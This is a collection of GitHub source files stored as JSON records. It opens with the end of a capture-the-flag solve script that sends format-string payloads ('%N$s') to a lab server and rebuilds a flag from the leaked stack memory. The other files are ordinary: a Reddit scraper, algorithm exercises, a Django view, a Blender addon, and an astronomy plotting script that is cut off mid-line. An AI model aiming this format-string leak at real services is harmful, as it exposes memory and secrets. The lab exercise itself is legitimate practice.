warnings\n\nwarnings.filterwarnings(\"ignore\", category=BytesWarning, message=\"Text is not bytes; assuming ASCII, no guarantees.\")\ncontext.log_level = 'info'\n\nflag = ''\n\nfor i in range(1, 100):\n try:\n io = remote('10.0.14.28', 1337, level='warn')\n io.recvuntil(\"Give me a word and i'll say it back at you...\")\n io.sendline('%{}$s'.format(i).encode())\n io.recvlines(2)\n result = io.recvline()\n if not b'nil' in result:\n print(str(i) + ': ' + str(result))\n try:\n # Decode, reverse endianess and print\n decoded = unhex(result.strip().decode()[2:])\n reversed_hex = decoded[::-1]\n print(str(reversed_hex))\n # Build up flag\n flag += reversed_hex.decode()\n except BaseException:\n pass\n io.close()\n except EOFError:\n io.close()\n\n# Print and close\ninfo(flag)\nwith open('result.txt', 'w') as file:\n file.write(flag)\n","repo_name":"markuched13/markuched13.github.io","sub_path":"solvescript/echoctf/stringer/leak.py","file_name":"leak.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"18315124487","text":"import configparser\nimport csv\nimport json\nimport os\nimport praw\nfrom prawcore.exceptions import Forbidden\n\ncounter = 1\ncomment_file_name = \"input/saved_comments.csv\"\n\n# Read the configuration file\nconfig = configparser.ConfigParser()\nconfig.read('settings.ini')\n\n\nreddit_client = config['reddit_client']\nreddit = praw.Reddit(client_id=reddit_client['client_id'],\n client_secret=reddit_client['client_secret'],\n user_agent=reddit_client['user_agent'])\n\nquarantined_section = config['quarantined']\nfor quarantined_subreddit in quarantined_section:\n reddit.subreddit(quarantined_subreddit).quaran.opt_in()\n\ndef make_json_saver():\n obj_list = []\n def 
save_json(obj):\n if obj != None:\n obj_list.append(obj)\n return obj_list\n return save_json\n# Saves json to a list and returns the list\nsave_json = make_json_saver()\n\ndef save_to_json(dict_list):\n filename = \"saved_data/saved_comments_json.json\"\n \n if os.path.exists(filename) and os.path.getsize(filename) > 0: # check if file exists and is not empty\n with open(filename, 'r') as f:\n data = json.load(f)\n data.extend(dict_list)\n else:\n data = dict_list # if file does not exist or is empty, start with your new data\n\n with open(filename, 'w') as f:\n json.dump(data, f, indent=4)\n\ndef get_next_five_replies(comment):\n try: # Ensure we're working with the most up-to-date comment structure\n comment.refresh()\n\n # comment.replies.list() flattens the structure\n flat_comments = comment.replies.list()\n\n # If there are at least five comments, return the first five\n if len(flat_comments) >= 5:\n return flat_comments[:5]\n # Otherwise, return all available comments\n else:\n return flat_comments\n except praw.exceptions.ClientException as e:\n print(f\"{e}\\n5 next comments excluded\\n\")\n return None\n except Exception as e:\n print(f\"{e}\\n5 next comments excluded\\n\")\n return None\n\ndef count_lines(filename=\"saved_comments.csv\"):\n with open(filename, 'r') as f:\n reader = csv.reader(f)\n row_count = sum(1 for row in reader)\n return row_count-1\n\n\ndef comment_to_dict(comment):\n replies = get_next_five_replies(comment)\n next_comments = [{'body': reply.body, 'author': str(reply.author), 'score': reply.score} for reply in replies] if replies is not None else []\n try:\n return {\n 'body': comment.body,\n 'author': str(comment.author),\n 'score': comment.score,\n 'id': comment.id,\n 'created': comment.created_utc,\n 'subreddit': comment.subreddit.display_name,\n 'permalink': comment.permalink,\n 'subreddit': str(comment.subreddit),\n 'five_next_comments': next_comments,\n 'body_html': comment.body_html,\n \"post_info\": {\n \"title\": comment.submission.title,\n \"post_selftext\": comment.submission.selftext,\n \"post_id\": comment.submission.id,\n \"post_score\": comment.submission.score,\n \"post_url\": comment.submission.url,\n \"post_permalink\": comment.submission.permalink,\n }\n }\n except praw.exceptions.ClientException as e:\n print(f\"{e}\\n{comment.id} not saved\")\n return None\n\n\n \nwith open(comment_file_name, 'r') as f:\n reader = csv.reader(f)\n line_counter = count_lines(comment_file_name)\n print(f\"\\nThere are {line_counter} comments to save\\n\\n\")\n next(reader) # Skip header\n for row in reader:\n # Save to file if there are more than 50 saved comments\n if len(save_json(None)) >= 50:\n save_to_json(save_json(None))\n comment_id = row[0]\n try:\n print(f\"Saving number {counter}/{line_counter} id: {comment_id}\")\n comment = reddit.comment(id=comment_id)\n comment_dict = comment_to_dict(comment)\n #pprint(dict(comment_dict.items()))\n save_json(comment_dict)\n except Forbidden:\n print(f\"Access forbidden for comment with id: {comment_id}\")\n except Exception as e:\n print(f\"{e}\\n Something went wrong, comment with id: {comment_id} not saved\")\n finally: counter += 1\n\nsave_to_json(save_json(None))\nprint(\"\\nAll done!\\n\")\n\n","repo_name":"GenericUsername255/post_comment_downloader","sub_path":"save_comments.py","file_name":"save_comments.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41379515275","text":"def 
findCycle(adjList, n):\n    for v in range(1, n+1):\n        visited = [0 for i in range(n+1)]\n        explore(adjList, visited, v)\n\n        if visited[v] == 2:\n            return 1\n    return 0\n\ndef explore(adjList, visited, v):\n    visited[v] += 1\n\n    for u in adjList[v]:\n        if visited[u] == 0:\n            explore(adjList, visited, u)\n        else:\n            visited[u] += 1\n\nn, m = map(int, input().split())\nadjList = [[] for i in range(n + 1)]\nfor i in range(m):\n    u, v = map(int, input().split())\n    adjList[u].append(v)\n\nprint(findCycle(adjList, n))\n","repo_name":"macoto35/Graph_Algorithms","sub_path":"python/directedGraph/checkingConsistencyOfCSCurriculum.py","file_name":"checkingConsistencyOfCSCurriculum.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32660426279","text":"# Complete the countingSort function below.\ndef countingSort(arr):\n    \n    result = []\n\n    # Find the maximum value in the array and build a count array that holds the number of occurrences of each value from 0 to n\n    n = max(arr)\n    count = [0] * (n+1)\n    \n    # Every time a value appears, increase its occurrence count by one\n    for num in arr:\n        count[num] += 1\n    \n    # Walk the count array from 0 to n and append each value to result as many times as it occurred\n    for i in range(len(count)):\n        for j in range(count[i]):\n            result.append(i)\n    \n    return result","repo_name":"KimHyungkeun/Algorithm","sub_path":"HackerRank/Sorting/Countingsort2.py","file_name":"Countingsort2.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31855373984","text":"def seosta_lapsed_ja_vanemad(lapsed, nimed):\n    with open(lapsed) as fail:\n        lapsed = fail.read().strip().split(\"\\n\")\n    with open(nimed) as fail:\n        nimed = fail.read().strip().split(\"\\n\")\n    \n    nimi_kood_dict = {}\n    for nimi_kood in nimed:\n        nimi, kood = nimi_kood.split(\" \", 1)\n        nimi_kood_dict[nimi] = kood\n    vanem_laps_dict = {}\n    \n    for vanem_laps in lapsed:\n        vanem_id, laps_id = vanem_laps.split()\n        if laps_id not in vanem_laps_dict:\n            vanem_laps_dict[laps_id] = set()\n            vanem_laps_dict[laps_id].add(vanem_id)\n        else:\n            vanem_laps_dict[laps_id].add(vanem_id)\n    \n    result = {}\n    \n    for laps, vanem in vanem_laps_dict.items():\n        vanemad = set()\n        for v in vanem:\n            vanemad.add(nimi_kood_dict[v])\n        result[nimi_kood_dict[laps]] = vanemad\n    \n    for laps, vanemad in result.items():\n        print(f\"{laps}: {', '.join(vanemad)}\")\n    return result\n    \nseosta_lapsed_ja_vanemad(\"lapsed.txt\", \"nimed.txt\")","repo_name":"NFilin10/TU_programming_course","sub_path":"kodutööd/10_kodutöö/kodu1.py","file_name":"kodu1.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15120238305","text":"#!python3\n\n'''Day 14, part 1.'''\n\nfrom part10 import knot_hash\n\n\nTEST = 'flqrgnkx'\nCODE = 'ugkiagan'\n\n\ndef hex_to_bin(hex_string):\n    '''Convert hex string to binary string.\n\n    >>> hex_to_bin('1')\n    '0001'\n    >>> hex_to_bin('8')\n    '1000'\n    >>> hex_to_bin('f')\n    '1111'\n    >>> hex_to_bin('a0c2017')\n    '1010000011000010000000010111'\n    >>> hex_to_bin('70c2017')\n    '0111000011000010000000010111'\n    '''\n    parts = []\n    for x in hex_string:\n        int_x = int(x, 16)\n        parts.append(format(int_x, '04b'))\n    return ''.join(parts)\n\n\ndef sum_bin_digits(bin_string):\n    '''Sum the digits of binary number.\n\n    >>> sum_bin_digits('111')\n    3\n    >>> sum_bin_digits('1000101011')\n    5\n    '''\n    return bin_string.count('1')\n\n\ndef squares_used(code):\n    '''Calculate squares used.\n\n    >>> squares_used('flqrgnkx')\n    8108\n    
'''\n total = 0\n for i in range(128):\n full_code = f'{code}-{i}'\n h = knot_hash(full_code)\n b = hex_to_bin(h)\n # print(full_code)\n # print(b)\n count = sum_bin_digits(b)\n total += count\n return total\n\n\ndef main():\n '''Main entry point.'''\n total = squares_used(CODE)\n print(total)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"PreludeAndFugue/AdventOfCode","sub_path":"2017/part14.py","file_name":"part14.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8032865713","text":"from account.models import Account\nfrom django.shortcuts import render, redirect\nfrom .forms import SignUpForm\nfrom fitness.models import WeightAtDate\n\n# Create your views here.\n\ndef signup(request):\n\n if request.method == \"POST\":\n f = SignUpForm(request.POST)\n\n if f.is_valid():\n user = f.save()\n\n weight = f.cleaned_data['weight']\n if weight:\n weight_at_date = WeightAtDate(weight=weight, user=user)\n weight_at_date.save()\n \n \n return redirect('/')\n \n \n form = SignUpForm()\n\n return render(request, 'register/signup.html', {'form':form})\n","repo_name":"unibucMrz/licenta","sub_path":"register/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71786847186","text":"bl_info = {\n \"name\": \"Ctools Addon\",\n \"author\": \"Brendan Fitzgerald\",\n \"version\": (1, 0),\n \"blender\": (2, 93, 0),\n \"location\": \"View3D > Shelf > Ctools\",\n \"description\": \"Collection of tools that are useful for use in production assets\",\n \"warning\": \"\",\n \"doc_url\": \"https://github.com/c1112/bl_ctools/blob/main/README.md\",\n \"category\": \"Production\",\n}\n\nimport bpy\nimport bmesh\nimport random\nfrom mathutils import Color, Vector\n\nclass CTOOLS_OT_Restpos(bpy.types.Operator):\n bl_idname = \"ctools.rest\"\n bl_label = \"Set Rest Position\"\n\n def execute(self, context):\n my_object = bpy.context.active_object.data\n vert_list = my_object.vertices\n color_map_collection = my_object.vertex_colors\n\n try:\n color_map = color_map_collection['rest']\n except:\n color_map = color_map_collection.new(name='rest')\n\n\n i = 0\n for poly in my_object.polygons:\n for idx in poly.loop_indices:\n loop = my_object.loops[idx]\n v = loop.vertex_index\n x = (vert_list[v].co.x )\n y = (vert_list[v].co.y )\n z = (vert_list[v].co.z )\n t = 0\n final = (x,y,z,t)\n color_map.data[i].color = final\n i += 1\n\n return {'FINISHED'}\n\nclass CTOOLS_OT_VtxClr(bpy.types.Operator):\n \"\"\"Sets Vertex Color in Mesh Edit Mode\"\"\"\n bl_idname = \"ctools.vtxclr\"\n bl_label = \"Set Vertex Color\"\n btn_name : bpy.props.StringProperty()\n\n def execute(self, context):\n #get the objects for finding the verts\n edit_object = bpy.context.edit_object.data\n bm = bmesh.from_edit_mesh(edit_object)\n vert_list = bpy.context.active_object.data.vertices\n\n #setup the RGB Value based on ui input\n if(self.btn_name == \"random\"):\n RGBA = [random.uniform(0,1) for i in range(3)]\n RGBA.append(0)\n else:\n RGBA = clr = context.scene.mytool_color\n\n #get the selected faces\n selfaces = [ f for f in bm.faces if f.select]\n\n #selected verts and colors\n data = {}\n\n for poly in selfaces:\n for vrt in poly.verts:\n idx = vrt.index\n data[idx] = RGBA\n\n #switch modes and reaccess data\n bpy.ops.object.mode_set(mode='OBJECT')\n\n #get the mesh to run over\n mesh = 
bpy.context.active_object.data\n color_map_collection = mesh.vertex_colors\n\n try:\n color_map = color_map_collection['Cd']\n except:\n color_map = color_map_collection.new(name='Cd')\n #set inital color map to black\n i = 0\n for polygon in mesh.polygons:\n for idx in polygon.loop_indices:\n color_map.data[i].color = (0,0,0,0)\n i += 1\n\n #set Cd to the current active colormap\n if not color_map.active:\n color_map.active = 1\n\n #cycle through each polygon\n for polygon in mesh.polygons:\n #for each polygon cycle though the selected verts\n for selected_vert in data:\n #grab that vertices associated with the current polygon\n for i, index in enumerate(polygon.vertices):\n #if the selected vert is found in the current polygon\n if selected_vert == index:\n #return the loop indices for the selected vertex\n loop_index = polygon.loop_indices[i]\n #use the loop index to set the vertex color\n color_map.data[loop_index].color = data[selected_vert]\n\n\n #switch modes back to edit\n bpy.ops.object.mode_set(mode='EDIT')\n\n return {'FINISHED'}\n\n################################################################################\n################################################################################\n\nclass CTOOLS_PT_Mesh(bpy.types.Panel):\n \"\"\"Creates a Sub-Panel in the Property Area of the 3D View\"\"\"\n bl_label = \"CTools Mesh\"\n bl_space_type = \"VIEW_3D\"\n bl_region_type = \"UI\"\n bl_category = \"CTools\"\n bl_context = \"mesh_edit\"\n\n def draw(self, context):\n obj = context.object\n layout = self.layout\n\n row = layout.row()\n row.label(text=\"Active object is: {}\".format(obj.name))\n\n row = layout.row()\n row.prop(context.scene, \"mytool_color\")\n\n row = layout.row()\n usrop = row.operator(CTOOLS_OT_VtxClr.bl_idname, text=\"User Defined Vertex Color\")\n usrop.btn_name = \"user\"\n\n row = layout.row()\n randop = row.operator(CTOOLS_OT_VtxClr.bl_idname, text=\"Random Vertex Color\")\n randop.btn_name = \"random\"\n\nclass CTOOLS_PT_Object(bpy.types.Panel):\n \"\"\"Creates a Sub-Panel in the Property Area of the 3D View\"\"\"\n bl_label = \"CTools Object\"\n bl_space_type = \"VIEW_3D\"\n bl_region_type = \"UI\"\n bl_category = \"CTools\"\n bl_context = \"objectmode\"\n\n def draw(self, context):\n obj = context.object\n layout = self.layout\n\n row = layout.row()\n row.operator(CTOOLS_OT_Restpos.bl_idname, text=\"Generate Rest Position\")\n\n\ndef register():\n #Register Operators\n bpy.utils.register_class(CTOOLS_OT_VtxClr)\n bpy.utils.register_class(CTOOLS_OT_Restpos)\n #Register Panels\n bpy.utils.register_class(CTOOLS_PT_Mesh)\n bpy.utils.register_class(CTOOLS_PT_Object)\n\n\n #Hack for the moment. 
should roll this into a class\n bpy.types.Scene.mytool_color = bpy.props.FloatVectorProperty(\n name = \"Color Picker\",\n subtype = \"COLOR\",\n size = 4,\n min = 0.0,\n max = 1.0,\n default = (1.0,1.0,1.0,1.0))\n\n\ndef unregister():\n #Unregister Operators\n bpy.utils.unregister_class(CTOOLS_OT_VtxClr)\n bpy.utils.unregister_class(CTOOLS_OT_Restpos)\n #Unregister Panels\n bpy.utils.unregister_class(CTOOLS_PT_Mesh)\n bpy.utils.unregister_class(CTOOLS_PT_Object)\n\n del bpy.types.Scene.mytool_color\n\nif __name__ == \"__main__\":\n register()\n","repo_name":"c1112/bl_ctools","sub_path":"ctools.py","file_name":"ctools.py","file_ext":"py","file_size_in_byte":6206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17169977887","text":"# Your code from here\nimport csv\n\n\n\ndef get_musicians(file):\n import codecs\n from bs4 import BeautifulSoup\n f = codecs.open(file, 'r', 'utf-8')\n soup = BeautifulSoup(f.read(), 'lxml')\n l = list()\n for a in soup.find_all('a', href=True, title=True, text=True):\n if a['title'] == a.get_text():\n if '_' in a['href']:\n if a['href'].count('_') == 1:\n l.append(\"https://en.wikipedia.org\" + a['href'])\n return l\n\n\ndef get_text(name: object) -> object:\n import codecs\n from bs4 import BeautifulSoup\n f = codecs.open(name, 'r', 'utf-8')\n page_soup = BeautifulSoup(f.read(), 'lxml')\n all_text = \"\"\n for tag in page_soup.find_all('p'):\n all_text += tag.get_text()\n\n return all_text\n\n\ndef run():\n import os\n from gensim import corpora\n from gensim.parsing.preprocessing import STOPWORDS\n\n doc_list = [entry for entry in os.scandir('samples')]\n\n documents = [get_text(doc) for doc in doc_list]\n texts = [[word for word in document.lower().split()\n if word not in STOPWORDS and word.isalnum()]\n for document in documents]\n dictionary = corpora.Dictionary(texts)\n corpus = [dictionary.doc2bow(text) for text in texts]\n\n from gensim import models, similarities\n lsi = models.LsiModel(corpus, id2word=dictionary, num_topics=2)\n\n test_list = [entry for entry in os.scandir('test 3')]\n\n for test in test_list:\n vec_bow = dictionary.doc2bow(get_text(test).lower().split())\n vec_lsi = lsi[vec_bow]\n index = similarities.MatrixSimilarity(lsi[corpus])\n sims = index[vec_lsi]\n # print(sims)\n # d.append(test, doc_list[sims])\n\n sims = sorted(enumerate(sims), key=lambda item: -item[1])\n d = list()\n d.append((\"TestName\", \"SampleName\"))\n i = 0\n\n for sim in sims:\n if i >= len(test_list):\n break\n t = test_list[i].name\n i = i + 1\n t = str(t).split('.')[0]\n s = doc_list[sim[0]].name\n s = str(s).split('.')[0]\n\n d.append((t, s))\n\n return d\n\n\n# datafile = \"boogiewoogie.html\"\n# data = get_musicians(datafile)\n# print(data)\n\n# datafile = \"carolinedahl.html\"\n# data = get_text(datafile)\n# print(data)\n\n# all_text = \"\"\n# for entry in os.scandir('samples'):\n# all_text += get_text(entry)\n# print(all_text)\nd = run()\n\nwith open('output.csv', 'w') as myfile:\n wr = csv.writer(myfile, quoting=csv.QUOTE_NONE)\n for list in d:\n wr.writerow(list)\n","repo_name":"APCHITNIS/BAMM.101x","sub_path":"textmining_1.py","file_name":"textmining_1.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26089189369","text":"#time: O(N^(T/m)), N is number of candidates, T is the target, m is the minmum number in candidates\n#space: for collect: O(T/m), depth: O(T/m)\nclass Solution:\n def 
combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\n if not candidates or target <= 0:\n return []\n collect = []\n self.result = []\n self.helper(collect, 0, candidates, 0, target)\n return self.result\n \n def helper(self, collect, start, candidates, cur_sum, target):\n if cur_sum == target:\n self.result.append(list(collect))\n return\n if cur_sum > target:\n return\n for idx in range(start, len(candidates)):\n collect.append(candidates[idx])\n self.helper(collect, idx, candidates, cur_sum+candidates[idx], target)\n collect.pop()\n ","repo_name":"finderkiller/LeetCode","sub_path":"39CombinationSum.py","file_name":"39CombinationSum.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40631243354","text":"#// ============================================================================================= //\n#// //\n#// Filename: LTdwarfIndices_Set-indices.py //\n#// Description: Candidate Variable L and T brown dwarfs determination //\n#// using the Spectral Index method //\n#// //\n#// Version: 1 //\n#// Created: 13/06/2023 //\n#// Compiler: Python //\n#// //\n#// Author: Natalia Oliveros-Gomez //\n#// Email: onatalialucia@gmail.com //\n#// Company: Grupo Fisica Estelar Universidad de Guanajuato, México //\n#// //\n#// ============================================================================================= //\n#\n#// ============================================================================================= //\n#// Indications: You only need to modify the brown dwarf spectrum path // \n#// Indicate if it is L or T type //\n#// And if you want to print the index-index graph // \n#// //\n#// //\n#// //\n#// Compile with: python LTdwarfIndices // //\n#// ============================================================================================= //\n\n\nindices = 'Data/Models_indicesT.txt' #adds the directory and name of the file with the indices list\n#with names of indices: 'index_H', 'index_Jslope', etc ...\nspt = 'T' #add spectral type: T or L\nsave_index_index_plot = 'No' #If you don't want save the index-index plot change 'No'\nsave_histogram_plot = 'No'\n\nimport pandas as pd\nimport numpy as np\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.path import Path\nimport matplotlib.patches as patches\n\nindices_data = pd.read_csv(indices, delimiter='\\t', thousands=',', decimal='.', comment='#')\n\ndef TdwarfIndices(indices_data):\n \n ############################ Spectral indeces template J2228 ###########################\n \n index_temp_J_M2228 = 0.205\n index_temp_H_M2228 = 0.463\n index_temp_HJ_M2228 = 0.4145\n index_temp_J_H_M2228 = 0.0451\n index_temp_Jslope_M2228 = 0.633\n index_temp_Jcurve_M2228 = 0.154\n \n \n ########################## define variability areas ###########################\n \n verts00 = [(0.2,0.35), (0.39,0.35), (0.463,0.2010), (0.65,0.05), (0.2,0.05), (0.2,0.35)]\n verts01 = [(0.2,0.55), (0.415,0.55), (0.462,0.4167), (0.4,0.28), (0.2,0.28), (0.2,0.55)]\n verts02 = [(0.038,0.55), (0.065,0.55), (0.065,0.28), (0.057,0.28), (0.038,0.55)]\n verts03 = [(0.067,0.68), (0.067,0.2), (0.0325,0.2), (0.067,0.68)]\n\n verts10 = [(0.038,0.35), (0.067,0.35), (0.067,0.05), (0.0442,0.2005),(0.038,0.35)]\n verts11 = [(0.43,0.35), (0.63,0.35), (0.65,0.201), (0.63,0.05), (0.43,0.05), (0.43,0.35)]\n verts12 = [(0.43,0.515), (0.646,0.462), (0.75,0.2), (0.43,0.2), (0.43,0.515)]\n verts13 = [(0.43,0.52), (0.63,0.52), (0.65,0.4169), 
(0.63,0.28), (0.43,0.28), (0.43,0.52)]\n\n    verts20 = [(0.43,0.065), (0.85,0.065), (0.85,0.037), (0.43,0.046), (0.43,0.065)]\n    verts21 = [(0.43,0.35), (0.85,-0.07), (0.43,-0.07), (0.43,0.35)]\n    verts22 = [(0.2,0.35), (0.68,-0.07), (0.2,-0.07), (0.2,0.35)]\n    verts23 = [(0.065,0.34), (0.065,-0.07), (0.025,-0.07),(0.065,0.34)]\n\n    codes_5v = [\n        Path.MOVETO,\n        Path.LINETO,\n        Path.LINETO,\n        Path.LINETO,\n        Path.LINETO,\n        Path.CLOSEPOLY,\n        ]\n    codes_4v = [\n        Path.MOVETO,\n        Path.LINETO,\n        Path.LINETO,\n        Path.LINETO,\n        Path.CLOSEPOLY,\n        ]\n    codes_3v = [\n        Path.MOVETO,\n        Path.LINETO,\n        Path.LINETO,\n        Path.CLOSEPOLY,\n        ]\n    \n    path00 = Path(verts00, codes_5v)\n    path01 = Path(verts01, codes_5v)\n    path02 = Path(verts02, codes_4v)\n    path03 = Path(verts03, codes_3v)\n\n    path10 = Path(verts10, codes_4v)\n    path11 = Path(verts11, codes_5v)\n    path12 = Path(verts12, codes_4v)\n    path13 = Path(verts13, codes_5v)\n\n    path20 = Path(verts20, codes_4v)\n    path21 = Path(verts21, codes_3v)\n    path22 = Path(verts22, codes_3v)\n    path23 = Path(verts23, codes_3v)\n\n    patch00 = patches.PathPatch(path00, facecolor='gray', lw=1, alpha=0.25)\n    patch01 = patches.PathPatch(path01, facecolor='gray', lw=1, alpha=0.25)\n    patch02 = patches.PathPatch(path02, facecolor='gray', lw=1, alpha=0.25)\n    patch03 = patches.PathPatch(path03, facecolor='gray', lw=1, alpha=0.25)\n\n    patch10 = patches.PathPatch(path10, facecolor='gray', lw=1, alpha=0.25)\n    patch11 = patches.PathPatch(path11, facecolor='gray', lw=1, alpha=0.25)\n    patch12 = patches.PathPatch(path12, facecolor='gray', lw=1, alpha=0.25)\n    patch13 = patches.PathPatch(path13, facecolor='gray', lw=1, alpha=0.25)\n\n    patch20 = patches.PathPatch(path20, facecolor='gray', lw=1, alpha=0.25)\n    patch21 = patches.PathPatch(path21, facecolor='gray', lw=1, alpha=0.25)\n    patch22 = patches.PathPatch(path22, facecolor='gray', lw=1, alpha=0.25)\n    patch23 = patches.PathPatch(path23, facecolor='gray', lw=1, alpha=0.25)\n\n    ######################### index-index plot 
#########################\n \n \n fig = plt.figure(figsize=(24.0,13.5), constrained_layout = True) \n plt.rcParams['font.family'] = \"DejaVu Sans\" \n plt.rcParams['font.size'] = 25 \n plt.rc('xtick', direction='in')\n plt.rc('ytick', direction='in')\n\n ax1 = fig.add_subplot(341)\n ax1.set_xlabel('H-Index')\n ax1.set_ylabel('J-Index')\n ax1.plot(index_temp_H_M2228, index_temp_J_M2228,marker ='*',markersize=18, color='black')\n ax1.scatter(indices_data['index_H'], indices_data['index_J'],marker ='*' ,s=90, color='blue')\n\n ax2 = fig.add_subplot(342)\n ax2.set_xlabel('H-Index')\n ax2.set_ylabel('H/J-Index')\n ax2.plot(index_temp_H_M2228, index_temp_HJ_M2228,marker ='*',markersize=18, color='black')\n ax2.scatter(indices_data['index_H'], indices_data['index_HJ'],marker ='*' ,s=90, color='blue')\n\n ax3 = fig.add_subplot(343)\n ax3.set_xlabel('J-H-Index')\n ax3.set_ylabel('H/J-Index')\n ax3.plot(index_temp_J_H_M2228, index_temp_HJ_M2228,marker ='*',markersize=18, color='black')\n ax3.scatter(indices_data['index_J_H'], indices_data['index_HJ'],marker ='*' ,s=90, color='blue')\n\n ax4 = fig.add_subplot(344)\n ax4.set_xlabel('J-H-Index')\n ax4.set_ylabel('H-Index')\n ax4.plot(index_temp_J_H_M2228, index_temp_H_M2228,marker ='*',markersize=18, color='black')\n ax4.scatter(indices_data['index_J_H'], indices_data['index_H'],marker ='*' ,s=90, color='blue')\n\n ax5 = fig.add_subplot(345)\n ax5.set_xlabel('J-H-Index')\n ax5.set_ylabel('J-Index')\n ax5.plot(index_temp_J_H_M2228, index_temp_J_M2228,marker ='*',markersize=18, color='black')\n ax5.scatter(indices_data['index_J_H'], indices_data['index_J'],marker ='*' ,s=90, color='blue')\n\n ax6 = fig.add_subplot(346)\n ax6.set_xlabel('Jslope-Index')\n ax6.set_ylabel('J-Index')\n ax6.plot(index_temp_Jslope_M2228, index_temp_J_M2228,marker ='*',markersize=18, color='black')\n ax6.scatter(indices_data['index_Jslope'], indices_data['index_J'],marker ='*' ,s=90, color='blue')\n\n ax7 = fig.add_subplot(347)\n ax7.set_xlabel('Jslope-Index')\n ax7.set_ylabel('H-Index')\n ax7.plot(index_temp_Jslope_M2228, index_temp_H_M2228,marker ='*',markersize=18, color='black')\n ax7.scatter(indices_data['index_Jslope'], indices_data['index_H'],marker ='*' ,s=90, color='blue')\n\n ax8 = fig.add_subplot(348)\n ax8.set_xlabel('Jslope-Index')\n ax8.set_ylabel('H/J-Index')\n ax8.plot(index_temp_Jslope_M2228, index_temp_HJ_M2228,marker ='*',markersize=18, color='black')\n ax8.scatter(indices_data['index_Jslope'], indices_data['index_HJ'],marker ='*' ,s=90, color='blue')\n\n ax9 = fig.add_subplot(349)\n ax9.set_xlabel('Jslope-Index')\n ax9.set_ylabel('J-H-Index')\n ax9.plot(index_temp_Jslope_M2228, index_temp_J_H_M2228,marker ='*',markersize=18, color='black')\n ax9.scatter(indices_data['index_Jslope'], indices_data['index_J_H'],marker ='*' ,s=90, color='blue')\n\n ax10 = fig.add_subplot(3,4,10)\n ax10.set_xlabel('Jslope-Index')\n ax10.set_ylabel('Jcurve-Index')\n ax10.plot(index_temp_Jslope_M2228, index_temp_Jcurve_M2228,marker ='*',markersize=18, color='black')\n ax10.scatter(indices_data['index_Jslope'], indices_data['index_Jcurve'],marker ='*' ,s=90, color='blue')\n\n ax11 = fig.add_subplot(3,4,11)\n ax11.set_xlabel('H-Index')\n ax11.set_ylabel('Jcurve-Index')\n ax11.plot(index_temp_H_M2228, index_temp_Jcurve_M2228,marker ='*',markersize=18, color='black')\n ax11.scatter(indices_data['index_H'], indices_data['index_Jcurve'],marker ='*' ,s=90, color='blue')\n\n ax12 = fig.add_subplot(3,4,12)\n ax12.set_xlabel('J-H-Index')\n ax12.set_ylabel('Jcurve-Index')\n 
ax12.plot(index_temp_J_H_M2228, index_temp_Jcurve_M2228,marker ='*',markersize=18, color='black')\n ax12.scatter(indices_data['index_J_H'], indices_data['index_Jcurve'],marker ='*' ,s=90, color='blue')\n \n #Define the limits in yx plots\n ax1.set_ylim((index_temp_J_M2228 -0.15,index_temp_J_M2228 + 0.15))\n ax1.set_xlim((index_temp_H_M2228 -0.25,index_temp_H_M2228 + 0.25))\n ax2.set_ylim((index_temp_HJ_M2228 -0.12,index_temp_HJ_M2228 + 0.12))\n ax2.set_xlim((index_temp_H_M2228 -0.25,index_temp_H_M2228 + 0.25))\n ax3.set_ylim((index_temp_HJ_M2228 -0.12,index_temp_HJ_M2228 + 0.12))\n ax3.set_xlim((index_temp_J_H_M2228 -0.02,index_temp_J_H_M2228 + 0.02))\n ax4.set_ylim((index_temp_H_M2228 -0.25,index_temp_H_M2228 + 0.25))\n ax4.set_xlim((index_temp_J_H_M2228 -0.02,index_temp_J_H_M2228 + 0.02))\n\n ax5.set_ylim((index_temp_J_M2228 -0.15,index_temp_J_M2228 + 0.15))\n ax5.set_xlim((index_temp_J_H_M2228 -0.02,index_temp_J_H_M2228 + 0.02))\n ax6.set_ylim((index_temp_J_M2228 -0.15,index_temp_J_M2228 + 0.15))\n ax6.set_xlim((index_temp_Jslope_M2228 -0.2,index_temp_Jslope_M2228 + 0.2))\n ax7.set_ylim((index_temp_H_M2228 -0.25,index_temp_H_M2228 + 0.25))\n ax7.set_xlim((index_temp_Jslope_M2228 -0.2,index_temp_Jslope_M2228 + 0.2))\n ax8.set_ylim((index_temp_HJ_M2228 -0.1,index_temp_HJ_M2228 + 0.1))\n ax8.set_xlim((index_temp_Jslope_M2228 -0.2,index_temp_Jslope_M2228 + 0.2))\n\n ax9.set_ylim((index_temp_J_H_M2228 -0.02,index_temp_J_H_M2228 + 0.02))\n ax9.set_xlim((index_temp_Jslope_M2228 -0.2,index_temp_Jslope_M2228 + 0.2))\n ax10.set_ylim((index_temp_Jcurve_M2228 -0.22,index_temp_Jcurve_M2228 + 0.22))\n ax10.set_xlim((index_temp_Jslope_M2228 -0.2,index_temp_Jslope_M2228 + 0.2))\n ax11.set_ylim((index_temp_Jcurve_M2228 -0.22,index_temp_Jcurve_M2228 + 0.22))\n ax11.set_xlim((index_temp_H_M2228 -0.25,index_temp_H_M2228 + 